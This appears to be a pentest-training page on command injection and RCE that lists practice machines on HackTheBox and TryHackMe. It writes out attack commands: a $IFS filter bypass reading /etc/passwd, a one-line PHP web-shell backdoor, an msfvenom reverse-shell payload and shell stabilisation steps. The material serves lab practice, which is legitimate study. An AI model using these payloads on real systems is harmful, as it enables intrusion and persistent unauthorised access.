ZeroBox

Command Injection and RCE: practice machines and key commands

Command injection occurs when an application passes input to a system shell. Try separators such as ;, &&, |, backticks and $() after a legitimate value, and test blind cases with a sleep or an out-of-band request to your own listener. When spaces or specific characters are filtered, alternatives like ${IFS}, brace expansion and quoting tricks often bypass the check. Once you can run a command, prefer a short reverse shell or write a web shell, then stabilise the TTY before enumerating. Public remote code execution exploits for known CVEs follow the same pattern but usually need edits to the target address, payload or offsets, so read the code before running it. Identify the service version first, then match it to a trusted advisory. The machines here have a command execution foothold.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

Command Injection Space Filter Bypass ($IFS)

Bypass space character filtering in vulnerable web commands using bash internal field separator.

cat$IFS/etc/passwd

Minimal PHP Single-Line Backdoor

Lightweight PHP command execution backdoor for quick web root persistence.

echo '<?php system($_GET["cmd"]); ?>' > shell.php

msfvenom Linux x64 Staged Reverse TCP ELF

Compile standalone ELF reverse shell binary for x64 Linux target.

msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elf

TTY Interactive Shell Stabilization (Python + stty)

Upgrade dumb reverse shell to fully interactive pseudo-terminal with tab completion and arrow keys.

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Press Ctrl+Z to background shell
stty raw -echo; fg
export TERM=xterm-256color
stty rows 38 columns 140

Keep going

Command Injection and RCE machines (40)

5 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 33 Linux, 7 Windows.

Very Easy (1)

MachinePlatformOSTags
PennyworthHTBLinuxJenkins, Groovy, RCE, Default Credentials

Easy (16)

MachinePlatformOSTags
Agent TTHMLinuxPHP-8.1.0-dev, Backdoor, User-Agent-t, RCE
EpochTHMLinuxCommand-Injection
Pickle RickTHMLinuxWeb-Enumeration, Command-Injection, Sudo-Privesc
Vulnerability CapstoneTHMLinuxFuel-CMS, CVE-2020-17463, RCE
ArcticHTBWindowsExploit-modification, HTB, and-HTTP-requests
BusquedaHTBLinuxCPTS, RCE, Python, Searchor
IgniteTHMLinuxOSCP, Fuel CMS, CVE-2018-16763, RCE
IrkedHTBLinuxExploit-modification, HTB
LoveHTBWindowsApplocker-policies, Exploit-modification, HTB
NetworkedHTBLinuxCommand-injection, File-upload-bypass, HTB
PhotobombHTBLinuxCommand-Injection, HTB
PreciousHTBLinuxCPTS, Command Injection, pdfkit, YAML Deserialization
ResTHMLinuxRedis, Unauthorized-Access, Webshell, SUID-Xxd
RouterSpaceHTBLinuxCVE-2021-3156, Command-Injection, HTB, Using-Android-Emulators
ScriptKiddieHTBLinux2020, 7384, CVE-2020-7384, Exploiting-CVE
SwagShopHTBLinuxCVE-2015-1397, Exploit-modification, GTFObins, HTB

Medium (12)

MachinePlatformOSTags
BastardHTBWindowsEnumerating-CMS-versions, Exploit-modification, HTB, techniques
CronosHTBLinuxCommand-Injection, Exploiting-cron-jobs, HTB, SQL-Injection
DevzatHTBLinuxCVE-2019-20933, Command-Injection, HTB, Source-code-review
dynstrHTBLinuxCommand-Injection, Dynamic-DNS, HTB
HealthHTBLinuxExploit-modification, HTB
LookupTHMLinuxELK, Command-Injection
MetaHTBLinux2020, 2021, 22204-and-CVE, 29599
PitHTBLinux12744, 2019, CVE-2019-12744, Exploiting-CVE
RelevantTHMWindowsOSCP, SMB, IIS, WebShell
TentenHTBLinuxBasic-steganography, Enumerating-Wordpress, Exploit-modification, HTB
The Cod CaperTHMLinuxOSCP, SQLi, Command Injection, Buffer Overflow
TheNotebookHTBLinux2019, CVE-2019-5736, Exploiting-CVE, HTB

Hard (7)

MachinePlatformOSTags
DropzoneHTBWindowsExploit-modification, HTB, TFTP-data-transfer
EarlyAccessHTBLinuxCommand-injection, HTB, Linux-capabilities, PHP-filtering
MonitorsHTBLinuxCVE-2020-9496, Exploit-modification, HTB, Java-Deserialization
OverflowHTBLinux2021, 22204, Buffer-Overflow, CVE-2021-22204
TallyHTBWindowsEnumerating-Sharepoint, Exploit-modification, Exploiting-MSSQL, HTB
Year of the DogTHMLinuxSQLi, Gitea, Command-Injection
Year of the FoxTHMLinuxCommand-Injection, Port-Forwarding

Insane (4)

MachinePlatformOSTags
BankrobberHTBWindowsBuffer-Overflow, Command-Injection, File-read-through-SQLi, HTB
BrainfuckHTBLinuxEnumerating-mail-servers, Exploit-modification, Exploiting-Wordpress, HTB
NightmareHTBLinuxCVE-2017-1000112, Exploit-modification, HTB, Reverse-engineering-64
StackedHTBLinux2021, 32090, CVE-2021-32090, Exploiting-CVE

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox